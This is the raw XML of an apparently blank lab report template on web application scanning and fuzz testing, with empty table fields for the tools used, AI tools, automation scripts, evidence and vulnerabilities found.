        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2925" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1FC17AE4" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920D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Cs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00920DE2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C944655" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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1751" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F5B0BFD" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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1752" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22E7ABF9" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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920DE2" w:rsidRPr="00920DE2" w14:paraId="67CCDE0A" w14:textId="77777777" w:rsidTr="00920DE2">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2925" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="723676DC" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920D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Cs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00920DE2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>5.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E7ACBB6" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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1751" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37E5CD46" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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1752" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0600CD33" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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920DE2" w:rsidRPr="00920DE2" w14:paraId="64AB6877" w14:textId="77777777" w:rsidTr="00920DE2">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2925" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="396F0E88" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920D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Cs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00920DE2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>6.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="748D5CA2" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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1751" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E279BE6" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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1752" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0094B9E0" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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920DE2" w:rsidRPr="00920DE2" w14:paraId="05B3288F" w14:textId="77777777" w:rsidTr="00920DE2">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2925" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1ED38FE0" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920D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Cs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00920DE2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>7.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35433FDE" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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1751" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FF60A07" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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1752" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CEB9B57" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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920DE2" w:rsidRPr="00920DE2" w14:paraId="240EE0E5" w14:textId="77777777" w:rsidTr="00920DE2">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2925" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4527A228" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920D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Cs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00920DE2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>8.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C84B8D1" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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1751" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2AB2ED10" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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1752" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D3D4F10" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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920DE2" w:rsidRPr="00920DE2" w14:paraId="073B4CF0" w14:textId="77777777" w:rsidTr="00920DE2">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2925" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="69D680FD" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920D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Cs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00920DE2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>9.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="651F54E8" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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1751" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E0930CE" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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1752" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41A23796" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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920DE2" w:rsidRPr="00920DE2" w14:paraId="118475B1" w14:textId="77777777" w:rsidTr="00920DE2">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2925" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="090345B1" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920D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Cs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00920DE2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">10. </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D955B1C" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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1751" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45D529C6" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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1752" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1DB05A49" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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920DE2" w:rsidRPr="00920DE2" w14:paraId="22FAB647" w14:textId="77777777" w:rsidTr="0057790A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2925" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21A3D29B" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="0057790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20DE2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Web Application Vulnerability Scanners Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6435" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24D34CD7" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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937A759" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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71BF9F7" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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7516382" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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8631F7C" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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DBBA6CB" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE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1287B" w:rsidRPr="00920DE2" w14:paraId="59F525E7" w14:textId="77777777" w:rsidTr="0057790A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2925" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3704A0B3" w14:textId="01D784EF" w:rsidR="0031287B" w:rsidRPr="00920DE2" w:rsidRDefault="0031287B" w:rsidP="0057790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A7B6B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AI Tools Used </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6435" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4413712F" w14:textId="77777777" w:rsidR="0031287B" w:rsidRDefault="0031287B" w:rsidP="0031287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C030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[*ShellGPT, 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ChatGPT, </w:t>
            </w:r>
            <w:r w:rsidRPr="002C030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Custom Scripts, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38E9DFEF" w14:textId="77777777" w:rsidR="0031287B" w:rsidRDefault="0031287B" w:rsidP="0031287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795D40F" w14:textId="77777777" w:rsidR="0031287B" w:rsidRPr="00920DE2" w:rsidRDefault="0031287B" w:rsidP="0031287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1287B" w:rsidRPr="00920DE2" w14:paraId="45AB2F3E" w14:textId="77777777" w:rsidTr="0057790A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2925" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A8190F1" w14:textId="53404932" w:rsidR="0031287B" w:rsidRPr="00BA7B6B" w:rsidRDefault="0031287B" w:rsidP="0057790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B6A7F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6435" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6444DDAD" w14:textId="77777777" w:rsidR="0031287B" w:rsidRDefault="0031287B" w:rsidP="0031287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0F91FDF" w14:textId="77777777" w:rsidR="0031287B" w:rsidRDefault="0031287B" w:rsidP="0031287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7A23A81" w14:textId="77777777" w:rsidR="0031287B" w:rsidRPr="002C030C" w:rsidRDefault="0031287B" w:rsidP="0031287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1287B" w:rsidRPr="00920DE2" w14:paraId="5B5D2EBB" w14:textId="77777777" w:rsidTr="0057790A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2925" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25BFB5D6" w14:textId="20D6B1CC" w:rsidR="0031287B" w:rsidRPr="004B6A7F" w:rsidRDefault="0031287B" w:rsidP="0057790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3422B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Extracted Information </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6435" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="676FAE3B" w14:textId="77777777" w:rsidR="0031287B" w:rsidRDefault="0031287B" w:rsidP="0031287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27C0671" w14:textId="77777777" w:rsidR="0031287B" w:rsidRDefault="0031287B" w:rsidP="0031287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B10044E" w14:textId="77777777" w:rsidR="0031287B" w:rsidRDefault="0031287B" w:rsidP="0031287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081E35A" w14:textId="77777777" w:rsidR="0031287B" w:rsidRDefault="0031287B" w:rsidP="0031287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6AFA517" w14:textId="77777777" w:rsidR="0031287B" w:rsidRDefault="0031287B" w:rsidP="0031287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</w:tbl>
    <w:p w14:paraId="4C95EA09" w14:textId="77777777" w:rsidR="0031287B" w:rsidRPr="00A51A96" w:rsidRDefault="0031287B" w:rsidP="0031287B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287B" w14:paraId="2E9D938A" w14:textId="77777777" w:rsidTr="0057790A">
        <w:trPr>
          <w:trHeight w:val="5192"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E404226" w14:textId="77777777" w:rsidR="0031287B" w:rsidRDefault="0031287B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="72366E57" w14:textId="77777777" w:rsidR="0031287B" w:rsidRDefault="0031287B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D33E4D6" w14:textId="77777777" w:rsidR="0031287B" w:rsidRDefault="0031287B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3ADEA881" w14:textId="77777777" w:rsidR="0031287B" w:rsidRDefault="0031287B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0AF330A3" w14:textId="77777777" w:rsidR="0031287B" w:rsidRDefault="0031287B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78503A12" w14:textId="77777777" w:rsidR="004121BA" w:rsidRDefault="004121BA" w:rsidP="000947B4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D306F2" w:rsidRPr="00A51A96" w14:paraId="0B53775D" w14:textId="77777777" w:rsidTr="009F2288">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6C1561BD" w14:textId="455EF04F" w:rsidR="00D306F2" w:rsidRPr="003C713F" w:rsidRDefault="00D306F2" w:rsidP="0085194C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bookmarkStart w:id="3" w:name="_Hlk189064991"/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2.2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AA5D3D" w:rsidRPr="00AA5D3D">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Perform Web Application Fuzz Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="3"/>
    </w:tbl>
    <w:p w14:paraId="030CBCEF" w14:textId="77777777" w:rsidR="0031287B" w:rsidRPr="00D609D1" w:rsidRDefault="0031287B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55"/>
        <w:gridCol w:w="3202"/>
        <w:gridCol w:w="3503"/>
      </w:tblGrid>
      <w:tr w:rsidR="00803392" w:rsidRPr="00803392" w14:paraId="15E8F4C8" w14:textId="77777777" w:rsidTr="00A7152A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38394595" w14:textId="77777777" w:rsidR="00803392" w:rsidRPr="00803392" w:rsidRDefault="00803392" w:rsidP="00A7152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03392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082F33F5" w14:textId="77777777" w:rsidR="00803392" w:rsidRPr="00803392" w:rsidRDefault="00803392" w:rsidP="0080339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03392" w:rsidRPr="00803392" w14:paraId="1DE0D3ED" w14:textId="77777777" w:rsidTr="00A7152A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250347AB" w14:textId="77777777" w:rsidR="00803392" w:rsidRPr="00803392" w:rsidRDefault="00803392" w:rsidP="00A7152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03392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09E128A4" w14:textId="77777777" w:rsidR="00803392" w:rsidRPr="00803392" w:rsidRDefault="00803392" w:rsidP="0080339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03392" w:rsidRPr="00803392" w14:paraId="343E940E" w14:textId="77777777" w:rsidTr="00A7152A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52EF55A" w14:textId="77777777" w:rsidR="00803392" w:rsidRPr="00803392" w:rsidRDefault="00803392" w:rsidP="00A7152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03392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058757C3" w14:textId="77777777" w:rsidR="00803392" w:rsidRPr="00803392" w:rsidRDefault="00803392" w:rsidP="0080339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03392" w:rsidRPr="00803392" w14:paraId="0141638F" w14:textId="77777777" w:rsidTr="00A7152A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FC2AA1C" w14:textId="77777777" w:rsidR="00803392" w:rsidRPr="00803392" w:rsidRDefault="00803392" w:rsidP="00A7152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03392">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Is Web Application Fuzz Testing Performed Successfully</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3202" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A04E9E2" w14:textId="77777777" w:rsidR="00803392" w:rsidRPr="00803392" w:rsidRDefault="00803392" w:rsidP="00803392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803392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398D6AA7" w14:textId="77777777" w:rsidR="00803392" w:rsidRPr="00803392" w:rsidRDefault="00803392" w:rsidP="00803392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803392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B14E7B" w:rsidRPr="00803392" w14:paraId="4B4D62BA" w14:textId="77777777" w:rsidTr="00A7152A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48797E11" w14:textId="5B81E213" w:rsidR="00B14E7B" w:rsidRPr="00803392" w:rsidRDefault="00B14E7B" w:rsidP="00A7152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Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75E56F71" w14:textId="77777777" w:rsidR="00B14E7B" w:rsidRDefault="007310BB" w:rsidP="00B14E7B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7310BB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[*If any]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ABE526A" w14:textId="77777777" w:rsidR="00CD52BB" w:rsidRDefault="00CD52BB" w:rsidP="00B14E7B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53505157" w14:textId="31161645" w:rsidR="00CD52BB" w:rsidRPr="007310BB" w:rsidRDefault="00CD52BB" w:rsidP="00B14E7B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803392" w:rsidRPr="00803392" w14:paraId="7AABF609" w14:textId="77777777" w:rsidTr="00A7152A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44952516" w14:textId="77777777" w:rsidR="00803392" w:rsidRPr="00803392" w:rsidRDefault="00803392" w:rsidP="00A7152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803392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Web Application Vulnerabilities Identified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28BCA96B" w14:textId="77777777" w:rsidR="00803392" w:rsidRPr="00803392" w:rsidRDefault="00803392" w:rsidP="00843567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8BC2671" w14:textId="77777777" w:rsidR="00803392" w:rsidRPr="00803392" w:rsidRDefault="00803392" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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51B9C36" w14:textId="77777777" w:rsidR="00803392" w:rsidRPr="00803392" w:rsidRDefault="00803392" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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F449151" w14:textId="77777777" w:rsidR="00803392" w:rsidRPr="00803392" w:rsidRDefault="00803392" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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487B820" w14:textId="77777777" w:rsidR="00803392" w:rsidRPr="00803392" w:rsidRDefault="00803392" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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5AF8C73" w14:textId="77777777" w:rsidR="00803392" w:rsidRPr="00803392" w:rsidRDefault="00803392" w:rsidP="0080339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03392" w:rsidRPr="00803392" w14:paraId="6276BF04" w14:textId="77777777" w:rsidTr="00A7152A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320AA471" w14:textId="77777777" w:rsidR="00803392" w:rsidRPr="00803392" w:rsidRDefault="00803392" w:rsidP="00A7152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03392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5D534F8D" w14:textId="77777777" w:rsidR="00803392" w:rsidRPr="00803392" w:rsidRDefault="00803392" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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01FBF85" w14:textId="77777777" w:rsidR="00803392" w:rsidRPr="00803392" w:rsidRDefault="00803392" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36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D032F5A" w14:textId="77777777" w:rsidR="00803392" w:rsidRPr="00803392" w:rsidRDefault="00803392" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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E3C67F6" w14:textId="77777777" w:rsidR="00803392" w:rsidRPr="00803392" w:rsidRDefault="00803392" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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E6D2129" w14:textId="77777777" w:rsidR="00803392" w:rsidRPr="00803392" w:rsidRDefault="00803392" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
